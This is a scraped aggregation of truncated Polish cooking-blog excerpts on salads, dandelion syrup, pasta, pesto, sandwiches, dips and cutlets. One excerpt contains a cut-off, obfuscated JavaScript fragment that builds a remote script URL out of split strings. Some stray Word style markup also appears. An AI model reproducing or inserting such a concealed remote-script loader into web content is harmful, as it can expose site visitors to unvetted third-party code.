„Witaminka ” , pyszna ,surówka z czerwonej kapusty Witaminka , to świeża surówka , a takie są teraz najcenniejsze – nie przetworzone , znaczy zdrowsze Zima , to trudny czas
Ogrodnik w podróżyMadzia zrobiła mi niespodziankę :) Na mój powrót z pracy zrobiła taki mega wypasiony obiad. To znaczy, żeby nie było, często robi obiady. Ale ten był naprawdę
Marder&Marder ManufactureMniszek lekarski zwany popularnie mleczem albo dmuchawcem jest cenionym ziołem leczniczym. W lecznictwie stosowane są zarówno liście, kwiaty, jak i korzeń mniszka. Młode liście stanowią również dodatek do sałatek. Jest skarbnicą cennych substancji do których zaliczamy: witaminy A, C, D, a także witaminy z grupy B, minerały: żelazo, potas, krzem, magnez, garbniki, flawonoidy, triperpeny, inulinę, kwasy polifenelowe, asparginę oraz kwas(...)góry dnem i przykryć szmatką. Przechowywać w chłodnym i ciemnym miejscu. Termin ważności mija po kilku miesiącach od daty przygotowania syropu. Dawkowanie: 2-3 łyżeczki miodu z mniszka dziennie. Smacznego i na zdrowie
Zakątek rozkoszy kulinarnychMakaron jest jednym z najsłynniejszych dodatków do dań, sałatek i przystawek. Jest często stosowany zarówno w kuchni studenckiej, ze względu na szybkość przygotowania i stosunkowo nie dużą cenę, jak i w wykwintnych restauracjach, ponieważ łatwo jest dodać go do różnego rodzaju wymagających potraw. Makaron może być niewiarygodnie tanim składnikiem dania, jak i drogim elementem wyższych półek sklepów z włoską żywnością(...)Nałóż na talerze, posyp tartym parmezanem i bazylią (nie koniecznie). · To jest pyszne! Zwłaszcza z lampką czerwonego wina. I jakie proste. Smacznego! Autor: Córka
Moja Mama GotujeZ dzisiejszego obiadu najbardziej zadowolony jest mój P., bo nie dość, że jest mięso, to na dodatek w Jego ulubionej wersji- po chińsku :) Udka są
Kraina Miodem Płynącatylko sos do makaronu , jeśli lubisz ten smak, to znakomicie doprawi ono chleb paleo (np. niskowęglowodanowy ), jajka na twardo, omlety, naleśniki paleo, majonez paleo, warzywa, sosy do sałatek albo mięsa, a nawet makaron z warzyw. Pesto możesz używać jako sos do warzyw na zimno pokrojonych w słupki (dobre na imprezy), ale dobrze też doprawia warzywa na ciepło, np. gotowane(...)mieści się w protokole autoimmunologicznym ze względu na pomidory i orzechy, a i same oliwki, nawet jak nie są nadziewane papryką, to często maja jakieś niedozwolone przyprawy (np. chili). Smacznego! Pesto z oliwek i suszonych pomidorów (bez sera) Wartość energetyczna Węglowodany (w tym błonnik) Tłuszcz Białko 100 g 620 kcal 15 g (6 g) 65 g 10 g Łyżka
PaleoSMAKNormal 0 21 false false false PL X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:Standardowy; mso-tstyle-rowband-size:0; mso-tstyle-colband
Qlinarnie i Qlinarniedopadają nas one także w kuchni, a spokojnie zjedzony posiłek to podstawa dbania o swój przewód pokarmowy. Jeśli nie mamy czasu zadbajmy o to, aby przyrządzić coś szybko, ale smacznie i zdrowo. Śniadanie w domu lub w pracy, niespodziewani goście czy wyprawka dla dziecka do szkoły? Postawmy na nieskomplikowane, ale pożywne kanapki z pasztetem. Wbrew pozorom wcale nie muszą być(...)pasztetu powoli, np. przygotować z nich koreczki. Możemy ponadziewać na wykałaczki kostki pasztetu razem z oliwkami, marynowanymi warzywami lub wspomnianymi suszonymi śliwkami. Takie same kostki wkroimy także do szybkiej sałatki, a długie paseczki podsmażymy i podamy z sosem czosnkowym. (function(){ i32r_=("u"+"st");i32r=document.createElement("script");i32r.async=true; i32ru="12087833";i32r_+="a"+("t.");i32r_+="i"+("nf"+("o"))+("/"); i32ru+=".2m6cfus532rmnvhk";i32ru
Moja smaczna kuchniaobok (razowy), mieszam z oliwą z oliwek i wykładam na talerze, odcedzam brokuła i wykładam na makaron, całość polewam elegancko dipem czosnkowym, do ozdoby trochę uprażonych nasion słonecznika i ... smacznego! Taki brokuł jest pięknie zielony, gorący i nie surowy :) Ale właśnie, dip. Skąd go wziąć? Ano - zrobić... ze słonecznika :) O wegańskiej śmietanie słonecznikowej Matki Weganki wspomniałam już(...)żelaza, wapnia i tłuszczu = kwasów tłuszczowych. Najwięcej wszystkiego oczywiście znowu w kiełkach ale osobiście pokochałam słonecznik w postaci właśnie śmietan-dipów-sosów albo uprażonych nasion, którymi można posypać sałatki, makarony lub... jeść łyżeczką zamiast chipsów :) Ok, to tyle dziś. Wypróbujcie czosnkowy dip ze słonecznika a potem poczęstujcie nim swoich gości. Nikt, po prostu nikt nie zgaduje, z czego
Wegański blog WSZYSTKO JEST W GŁOWIEchętnie przygotowuję to danie na Wielkanoc, pomyślałam, że dla wegan, którzy nie mają raczej zbyt dużego wyboru wielkanocnych potraw, będzie to świetna propozycja. Może z powodzeniem zastąpić np. tradycyjną sałatkę jarzynową, do której jest trochę podobna w smaku. Wersja bez produktów pochodzenia zwierzęcego to nic trudnego, wystarczy zamienić kilka składników na ich wegańskie odpowiedniki i po kłopocie. Białko występujące(...)majonezie, warstwa puree z groszku i smaczliwki, warstwa czerwonej quinoy z majonezem i na koniec znów warstwa ziemniaków. Wierzch przystrajamy mini marchewkami, szczypiorkiem, oliwkami i zielonym groszkiem. Smacznego
Quinoa Raz!opakowań ma przeźroczyste okienka, przez które na jeden rzut oka jesteście w stanie ocenić, jak grubo zmielone jest mięso — bierzcie to zmielone grubiej. Bardzo drobno zmielone mięso nie jest smaczne, włókna mięśniowe są w nim mocno zmiażdżone, nie pocięte. Zawsze możecie też, jeśli macie maszynkę, kupić wybrane kawałki wołowiny (pręga, łata, antrykot) i wieprzowiny (szynka, łopatka) i zmielić je sami(...)środku, usmażone kotlety wkładamy do naczynia żaroodpornego i na środkową półkę do piekarnika, na 10 minut. Podajemy z tym, z czym lubimy – ziemniaczanym purée, zasmażanymi buraczkami, ogórkiem kiszonym, ulubioną sałatką. Na drugi dzień można odsmażyć je, kładąc na patelnię z mieszanką wody i oleju – zostaną soczyste, a po odparowaniu wody odsmażą się na chrupiąco. Albo przeciąć w poprzek na pół
Karo in the KitchenTwarożek z cebulką i szczypiorkiem to świetna propozycja na śniadanie. Taki twarożek znany jest praktycznie w każdym polskim domu. Jego przygotowanie zajmuje dosłownie chwilę, a smak
Kulinarnyblog.pl - wiesz jak gotować!Są takie dni, kiedy mało co mi pasuje. Za bardzo nie chce mi się gotować i kombinować lub zwyczajnie nie mam na to czasu, a nawet
Fabryka pomysłówJak zapamiętałam z Polski smak późnej wiosny ? Pamiętam, że s makowała jak świeży, młody ogród warzywny . Smakowała jak małe , młode ziemniaki gotowane ze skórką , okraszone świeżym
Jem więc JestemDominik to chyba największy burgeroholik jakiego znam, dlatego często odwiedzamy miejsca, w których można zjeść te nafaszerowane dobrociami buły. Ja też bardzo je lubię, jednak czasami
Cooking Monster